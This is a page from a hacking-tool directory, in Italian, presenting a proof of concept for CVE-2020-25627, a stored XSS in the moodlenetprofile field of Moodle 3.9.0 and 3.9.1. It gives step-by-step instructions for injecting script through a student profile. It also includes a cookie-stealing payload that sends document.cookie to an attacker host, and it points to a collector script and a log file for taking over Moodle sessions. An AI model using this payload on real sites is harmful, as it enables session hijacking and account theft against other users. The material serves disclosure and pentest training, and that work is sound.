Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-25627 — XSS persistente tramite il parametro moodlenetprofile nel profilo utente | Kitploit
Strumenti/GitHubGitHub/hoangkien1020/cve-2020-25627
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubhoangkien1020/cve-2020-25627

CVE-2020-25627

XSS persistente tramite il parametro moodlenetprofile nel profilo utente

Vedi Repository
35 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-25627

XSS persistente tramite il parametro moodlenetprofile nel profilo utente

La mia PoC su questa CVE

Requisito utente: Studente (o il sito per la registrazione)

XSS in moodlenetprofile

root@kitploit:~
Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.

parametro moodlenetprofile

Versioni interessate: 3.9.0 , 3.9.1

Fonte

https://moodle.org/mod/forum/discuss.php?d=410839

Impatto della XSS (furto di cookie,...), vedi qui:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Scarica lo strumento